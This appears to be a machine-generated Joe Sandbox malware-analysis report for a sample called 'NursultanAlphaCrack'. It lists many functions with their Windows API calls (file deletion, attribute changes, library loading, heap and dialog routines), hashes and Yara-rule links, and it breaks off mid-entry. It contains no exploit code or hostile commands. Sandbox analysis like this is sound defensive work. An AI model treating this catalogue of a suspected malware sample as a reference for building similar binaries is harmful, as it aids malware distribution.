Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 48ddc44f966289685eed8ff53e27f95280867a4e811c0e295c79006681bff274
Instruction ID: 11e2c85c461254789e7b3288f3e06d53d48459a6b477a5ec87de0dd3eeeee46e
Opcode Fuzzy Hash: 48ddc44f966289685eed8ff53e27f95280867a4e811c0e295c79006681bff274
Instruction Fuzzy Hash: 2A11A571600700ABD724C668C849FB6B7E9AB75360F504A2DE563D2AD0D774ED45C760

Function 001E8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E8E75

Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00201098,001C17CE,?,?,00000007,?,?,?,001C13D6,?,00000000), ref: 001E8EB1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 8d71d65e461d3ad4ad6995382a350155624733d1566e7ce720a3be42af4868c1
Instruction ID: bcc7acef6af92756eacf9892338004beb70b63fdbc0747a8929a12b3f00ccd54
Opcode Fuzzy Hash: 8d71d65e461d3ad4ad6995382a350155624733d1566e7ce720a3be42af4868c1
Instruction Fuzzy Hash: E9F0F632211E827ADB252A67AC05FAF77588FD1B70F2D0125F81CA7191DF71CD0091A0

Function 001D109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 001D10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 001D10B2

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 9fb4ed2f113dbbde6e2b06cc9b32e7e410205b0d038af0ffbc542158d42e98c1
Instruction ID: 615e777f5a0964024a07eb32682f738d569bb2055511a21762b6f115667a0fea
Opcode Fuzzy Hash: 9fb4ed2f113dbbde6e2b06cc9b32e7e410205b0d038af0ffbc542158d42e98c1
Instruction Fuzzy Hash: A7E09272B00245B78F099BA49C058BB72DEEA442443104177F413D3601FB30DE818660

Function 001CA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501

Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: ba58171f24a2f065a77bb3f8fbccf3c52f9a6ade771ec46472d16a6c45ee1468
Instruction ID: 25587e2afae0330d88cd21a9ef351df18483de2576c1e5a6c906ea919a4feeeb
Opcode Fuzzy Hash: ba58171f24a2f065a77bb3f8fbccf3c52f9a6ade771ec46472d16a6c45ee1468
Instruction Fuzzy Hash: C6F0653524010D7BDF025F60DC45FEA376CAF24785F448055B945D5160DB71DED4DB50

Function 001CA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641,000000FF), ref: 001CA1F1

Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641), ref: 001CA21F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: bce78474c54c4860e8cb01404f384ead84a68eb319aa96a16205fbf39ee71f42
Instruction ID: 9d2359b0ed26501533ee749cc07fa419edd0333629cb84c610a99d1fdc65db84
Opcode Fuzzy Hash: bce78474c54c4860e8cb01404f384ead84a68eb319aa96a16205fbf39ee71f42
Instruction Fuzzy Hash: CFE0D83114021D6BDB015F60DC45FEA379CAF2C3C6F484026B944D6050EF71DEC4DA50

Function 001DAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,001F2641,000000FF), ref: 001DACB0
CoUninitialize.COMBASE(?,?,?,?,001F2641,000000FF), ref: 001DACB5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 6840381632a80871394c0a83da98c6313ec1a3984362cd3b3df2193e39ea66c1
Instruction ID: 2d4e879b4c63dd6819297fbdd955d2c21228fb6237d6db1c96094aed4c5ccd58
Opcode Fuzzy Hash: 6840381632a80871394c0a83da98c6313ec1a3984362cd3b3df2193e39ea66c1
Instruction Fuzzy Hash: A4E06572504650EFC711DB58EC46B55FBA9FB48B20F004266F416D3760CB746841CA90

Function 001CA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,001CA23A,?,001C755C,?,?,?,?), ref: 001CA254

Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001CA23A,?,001C755C,?,?,?,?), ref: 001CA280

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: a08afee060a968b4951be9b3c764e79d17f07f4c13cb3ab22b5a2941050de2e9
Instruction ID: 054f43604159751fecaf5922a1b205bf13b8b2508bf782731be37212a8f62531
Opcode Fuzzy Hash: a08afee060a968b4951be9b3c764e79d17f07f4c13cb3ab22b5a2941050de2e9
Instruction Fuzzy Hash: D4E092325001286BCB51AB64DC09FE97798EF283E6F044262FD54E32D4DB70DE84CAA0

Function 001DDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001DDEEC

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

SetDlgItemTextW.USER32(00000065,?), ref: 001DDF03

Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 1703479f418531ed7ecd66838b380db34de29dde05be6de2e3dce4e46ed23a2c
Instruction ID: ad0ca6aa347ecd75b82245b243d755fbf9b87b884a76f1ca5387b96a33c7c47c
Opcode Fuzzy Hash: 1703479f418531ed7ecd66838b380db34de29dde05be6de2e3dce4e46ed23a2c
Instruction Fuzzy Hash: 66E092B641434866DF02ABA0EC0AFDF3BAC5B25785F040856B245DA1A3DB78EA608661

Function 001D081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: d03c1d38f3ee5788932674b9cc9018f8cc988eab2f3c0dd0d38de1fc8e1b6596
Instruction ID: 94e0e37d992fb30b069b365ff85f78428a0bb69874e4ff5e5ac81b660b042ee6
Opcode Fuzzy Hash: d03c1d38f3ee5788932674b9cc9018f8cc988eab2f3c0dd0d38de1fc8e1b6596
Instruction Fuzzy Hash: 91E012768001186ADF11A794DC49FEA77ACAF19391F0400667645D2104DB74EA84CAA0

Function 001DA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001DA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001DA3E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 2c02796499e9c217cab7b9f508360917cda2fdc69ad66f480d5f48ddfcbc62c8
Instruction ID: c898d8e209b1a2b8818e551ec45dd98c68cd465bd078dd69c8f9c3f3ff2c44bb
Opcode Fuzzy Hash: 2c02796499e9c217cab7b9f508360917cda2fdc69ad66f480d5f48ddfcbc62c8
Instruction Fuzzy Hash: FEE0ED71500218EBCB10EF55C541799BBE8EF14361F10815BA98697341E374BF04DB91

Function 001E2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 001E2BB5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: b398fa642310e5e2f9377943055d879e240a904ebbd75ca63c3197c8b901e94f
Instruction ID: 883081661d210be806c6cf63dab2a39f6e35353d8c151d97d25eb2abdfc33558
Opcode Fuzzy Hash: b398fa642310e5e2f9377943055d879e240a904ebbd75ca63c3197c8b901e94f
Instruction Fuzzy Hash: FAD0A775154ED0244C242AB3283646C334E6D617757A00696E031878C1DF7290809011

Function 001C12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 001C1306
ShowWindow.USER32(00000000), ref: 001C130D

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: ed985a81419b382a48fd417d20c96caea45ad84dd47e512398486467ff50c56f
Instruction ID: 88997e03772d027593a6235b4822ca7926f3acb73a4137b63d516f1ab34dd6c3
Opcode Fuzzy Hash: ed985a81419b382a48fd417d20c96caea45ad84dd47e512398486467ff50c56f
Instruction Fuzzy Hash: E8C0123205C200BECB018BF4EC0DC2BBBA8ABA5312F04C908B0A9C0060C23CC120DF11

Function 001C1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C1A09

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 62bb55c33b0d03967fa52a2be21d5cb184d60ed811eb2a291d120633de942994
Instruction ID: f79c3976de7f3d7e7628d908a8fe47df7aa90dc0048ab80a55d5fc5c3a4e7bbb
Opcode Fuzzy Hash: 62bb55c33b0d03967fa52a2be21d5cb184d60ed811eb2a291d120633de942994
Instruction Fuzzy Hash: 00C18370A80254ABEF15DF64C498FB97BA5AF26310F0801BDEC569B297DB30DD44CB61

Function 001C3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C3BBF

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7c2d0b11cf487c60c1f2723a9ed53a6c045b90ae442a77a64230c700ebc7d729
Instruction ID: 72b04543805b434cc2b3293afce18a7cbc2be525475f808db6871fad20d2455d
Opcode Fuzzy Hash: 7c2d0b11cf487c60c1f2723a9ed53a6c045b90ae442a77a64230c700ebc7d729
Instruction Fuzzy Hash: FE71B271140B849EDB25DB74C855EEBB7E5AB35301F40482EE6BB87242DB32AA44CF11

Function 001C8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C8289

Part of subcall function 001C13DC: __EH_prolog.LIBCMT ref: 001C13E1

Part of subcall function 001CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: dcd81465dd6675a65ceab99344d1f4e4cf71dbcf5c7718b34c3b487323b23f4b
Instruction ID: 5158209d9bffb83b7156e3cc106c14b45048d0fa6d98aad839b3b253c4c54982
Opcode Fuzzy Hash: dcd81465dd6675a65ceab99344d1f4e4cf71dbcf5c7718b34c3b487323b23f4b
Instruction Fuzzy Hash: FF4196719446589ADB24EBA0CC95FE9B7A8BF30304F4414EFE18A57183EB71DE85CB50

Function 001C13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C13E1

Part of subcall function 001C5E37: __EH_prolog.LIBCMT ref: 001C5E3C

Part of subcall function 001CCE40: __EH_prolog.LIBCMT ref: 001CCE45

Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0c116f51ca657d6baffcd1b15254547bdca7d72c28c8af1b86c7e875334e1601
Instruction ID: 78fd1b1ee66443c944762416b449e3cfd1db4aff75744d354477a4e9d6f9edd2
Opcode Fuzzy Hash: 0c116f51ca657d6baffcd1b15254547bdca7d72c28c8af1b86c7e875334e1601
Instruction Fuzzy Hash: 0B4149B0905B409EE724DF798885AE6FBE5BF29300F54492ED5FF87282CB316654CB50

Function 001C13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C13E1

Part of subcall function 001C5E37: __EH_prolog.LIBCMT ref: 001C5E3C

Part of subcall function 001CCE40: __EH_prolog.LIBCMT ref: 001CCE45

Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b240d06736619d5cacee85f50ad9e46c5e105458164984970fee34a1be0de4b8
Instruction ID: 63be8a60bf5a55635ad965b65b3e1b5af5908cb564ffcb09eb5a63deb22d39cb
Opcode Fuzzy Hash: b240d06736619d5cacee85f50ad9e46c5e105458164984970fee34a1be0de4b8
Instruction Fuzzy Hash: A64145B0905B40AEE724DF798885AE6FBE5BF29300F54492ED5FE83282CB316654CB50

Function 001DB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DB098

Part of subcall function 001C13DC: __EH_prolog.LIBCMT ref: 001C13E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7bcf6e26fbb85f9635a40540957c2f50dbca092fea924ee0a479138a3b17f770
Instruction ID: caf842ad9573ccb8433398d309f6a5ab315a93eae2a01f596c1c7c1d293a13d0
